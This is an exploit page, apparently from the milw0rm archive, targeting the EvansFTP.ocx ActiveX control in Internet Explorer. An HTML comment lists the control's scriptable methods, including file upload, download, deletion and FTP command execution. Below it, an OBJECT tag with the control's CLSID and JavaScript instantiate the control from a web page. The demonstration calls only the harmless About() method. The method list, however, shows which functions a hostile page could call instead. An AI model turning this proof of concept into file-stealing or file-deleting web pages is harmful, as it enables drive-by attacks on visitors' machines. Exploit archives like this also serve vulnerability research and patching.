EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit

<HTML>
<!--

	- EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit -
	
		Author: t0pP8uZz
		Homepage: h4ck-y0u.org / milw0rm.com
		Description: ActiveX Remote Insecure
		
		Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 7 Fully Patched
		
		ActiveX: http://www.evansprogramming.com/evansftp.asp
	
		The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions.
	
		InternetExplorer can Initialise this ActiveX control, And take advantage of its functions.
		Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing one of its functions. the function being About()
		all this will do is lauch a friendly, harmless dialog box, therefore being the perfect POC.
		
		
	- EvansFTP.ocx -
	
		About	 	Displays the Evans FTP control About Dialog.
		CancelTransfer	 	Cancels in-progress file and data connection transfers.
		Connect	 	Opens a connection to the remote FTP server and starts a new session thread (logs in).
		DeleteFile	 	Deletes file(s) from a remote servers directory.
		Disconnect	 	Disconnects an FTP session (logs out).
		Execute	 	Executes a remote FTP server command.
		GetDirectory	 	Returns a list of directory information from the remote server.
		GetFile	 	Transfers files from a remote FTP server to a local PC.
		MakePath	 	Creates a path on the remote server. MakePath can create multiple nested subdirectories with a single command.
		MkDir	 	Creates a folder on the remote FTP server.
		Ping	 	Tests if a remote server is responding.
		PutFile	 	Transfers files from the local PC to a remote FTP server.
		RenameFile	 	Renames a file on the remote FTP server.
		RmDir	 	Removes a directory from the remote FTP server.
		WriteToConnection 	 	This method writes to an open data connection such as would be required to execute an ftp command like APPE.
		
	Peace.

-->
<OBJECT ID="test" CLASSID="CLSID:DA3C77F4-8701-11D4-908B-00010268221D">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit - */
/*                       Javascript Code By t0pP8uZz                        */

test.About();

</script>
</HTML>

# milw0rm.com [2008-05-09]